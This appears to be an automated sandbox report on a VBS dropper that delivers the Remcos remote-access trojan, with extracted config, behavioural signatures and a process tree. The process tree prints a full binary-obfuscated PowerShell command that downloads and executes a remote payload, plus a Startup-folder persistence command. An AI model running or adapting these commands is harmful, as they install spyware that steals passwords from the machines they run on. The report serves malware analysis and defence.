Analysis
-
max time kernel
150s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
10-09-2022 11:44
Static task
static1
Behavioral task
behavioral1
Sample
c1d6fcea01ed82777e63ebc9e6f085ce.vbs
Resource
win7-20220812-en
General
-
Target
c1d6fcea01ed82777e63ebc9e6f085ce.vbs
-
Size
2KB
-
MD5
c1d6fcea01ed82777e63ebc9e6f085ce
-
SHA1
5497cee7b0f9b4f7f81491779e88edd83f167a15
-
SHA256
de7a6bf628cdb1265197ea78967808850230114acb014cd0a39aa36adf2832f7
-
SHA512
d1ea396de7dc2204733d113e2fed0d89b93c61cf7165ff9798a858712a81c4d9ad6a78eb0f75271f9df9e590d85c9e328ee9ce1348d01c66e0a446cda8d07611
Malware Config
Extracted
remcos
AUGB22
saptransmissions.dvrlists.com:55026
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
AUGB22
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
AUGB22-JJZGN0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/540-102-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView behavioral1/memory/540-106-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1972-103-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/1972-104-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1640-100-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/1972-103-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/540-102-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft behavioral1/memory/1972-104-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/540-106-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1316 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 1316 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process target process PID 1316 set thread context of 808 1316 powershell.exe RegAsm.exe PID 808 set thread context of 1972 808 RegAsm.exe RegAsm.exe PID 808 set thread context of 540 808 RegAsm.exe RegAsm.exe PID 808 set thread context of 1640 808 RegAsm.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e0f3d159765a7f43b6bf060b4b70c9a300000000020000000000106600000001000020000000e06590f89fb6a2dd2d2d125039169a576f212df2b8c029396b57d4c224fd49b4000000000e80000000020000200000003e87f481640d7fc5a7c6a643da56379e24e3bb3471c10907573852017f39189220000000a9ddc973d4a991880db68a10d260f6daea5579f5d1ec327d667b0d322994028540000000dc44da36ea274868ff4b6dce73ecc9407042d1d483c2b1098b8f4717660cd399c076f8081414730e594138f65725c9132d517b8cb4022536d23285e6046396a8 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e0f3d159765a7f43b6bf060b4b70c9a300000000020000000000106600000001000020000000ce773007ec7609c0eac4ee771556e58a1a4b15cdcd1ec715c96ea6e8570fab2b000000000e8000000002000020000000035563904c930b46956bbef30fc3d6bfe62f04dbc743c2ba56bd1ab427beca4390000000c4f2d1415ab78ae5bda132d87dc26c39b7a5f50a989c8e48708c79f8dae556ffb29bee4bc8f869e72fd1e47ebea3462bf984c68c6b8f1aef74baa26408da91303dd9806ce77451394ec54100cde13e6a50ac1e608cc8647a02c32829178a2c4ca6aacb743bc25816ffa4c39443d99639603bf729797a5cec9e0676398d247edeeec6b630168d38a4d0b18b6d6fb0ad2e40000000c39a0a3910a13a4a5f5efb20cb2cfd17039ecae559ef5f1fe064fa860d205ba06163cb5e3359c12736507a22a148b9664b1bcb4be442b3655d2f8e966fe56354 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C245F061-310E-11ED-9551-6E705F4A26E5} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0b3629d1bc5d801 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exepid process 1316 powershell.exe 1744 powershell.exe 1316 powershell.exe 1316 powershell.exe 1972 RegAsm.exe 1972 RegAsm.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
RegAsm.exepid process 808 RegAsm.exe 808 RegAsm.exe 808 RegAsm.exe 808 RegAsm.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
powershell.exepid process 1744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeIncreaseQuotaPrivilege 1316 powershell.exe Token: SeSecurityPrivilege 1316 powershell.exe Token: SeTakeOwnershipPrivilege 1316 powershell.exe Token: SeLoadDriverPrivilege 1316 powershell.exe Token: SeSystemProfilePrivilege 1316 powershell.exe Token: SeSystemtimePrivilege 1316 powershell.exe Token: SeProfSingleProcessPrivilege 1316 powershell.exe Token: SeIncBasePriorityPrivilege 1316 powershell.exe Token: SeCreatePagefilePrivilege 1316 powershell.exe Token: SeBackupPrivilege 1316 powershell.exe Token: SeRestorePrivilege 1316 powershell.exe Token: SeShutdownPrivilege 1316 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeSystemEnvironmentPrivilege 1316 powershell.exe Token: SeRemoteShutdownPrivilege 1316 powershell.exe Token: SeUndockPrivilege 1316 powershell.exe Token: SeManageVolumePrivilege 1316 powershell.exe Token: 33 1316 powershell.exe Token: 34 1316 powershell.exe Token: 35 1316 powershell.exe Token: SeDebugPrivilege 1640 RegAsm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1732 iexplore.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
iexplore.exeIEXPLORE.EXERegAsm.exepid process 1732 iexplore.exe 1732 iexplore.exe 1704 IEXPLORE.EXE 1704 IEXPLORE.EXE 808 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
iexplore.exeWScript.exepowershell.exeRegAsm.exedescription pid process target process PID 1732 wrote to memory of 1704 1732 iexplore.exe IEXPLORE.EXE PID 1732 wrote to memory of 1704 1732 iexplore.exe IEXPLORE.EXE PID 1732 wrote to memory of 1704 1732 iexplore.exe IEXPLORE.EXE PID 1732 wrote to memory of 1704 1732 iexplore.exe IEXPLORE.EXE PID 1960 wrote to memory of 1316 1960 WScript.exe powershell.exe PID 1960 wrote to memory of 1316 1960 WScript.exe powershell.exe PID 1960 wrote to memory of 1316 1960 WScript.exe powershell.exe PID 1960 wrote to memory of 1744 1960 WScript.exe powershell.exe PID 1960 wrote to memory of 1744 1960 WScript.exe powershell.exe PID 1960 wrote to memory of 1744 1960 WScript.exe powershell.exe PID 1316 wrote to memory of 1032 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 1032 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 1032 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 1032 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 1032 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 1032 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 1032 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 1316 wrote to memory of 808 1316 powershell.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1972 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1352 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1352 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1352 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1352 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1352 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1352 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1352 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 540 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe PID 808 wrote to memory of 1640 808 RegAsm.exe RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110010,00110100,00110000,00101110,00110001,00110000,00110001,00101111,01010110,01101001,01110011,01100001,00101111,01010000,01100001,01111001,01100001,01100010,01101100,01100101,01110011,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='I' + 'EX';sal P $o00;([system.String]::Join('', $gf))|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1032
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jemjy"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1972
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thauzmma"4⤵
- Accesses Microsoft Outlook accounts
PID:540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thauzmma"4⤵PID:1352
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ebfmaexcfxw"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1d6fcea01ed82777e63ebc9e6f085ce.vbs'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1704
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55d4b7ff5508f5ed166fc9f63a2f477a1
SHA1b86bca5521c7ea20bd45e5763a732fe4af4dd10f
SHA256fbfac4755037c1ba7f7cd92de8fa3c729897190711503cf9c21fa957746b6e4a
SHA5123e126fe3b2c9863b821c2f7ee003ec8804f1e084c8ec48f65c1362a6e2fc6e91295ef78778ed4e560252e28ff4de9b565100e0ac7ff2b4ae8fa51c32676e4214
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81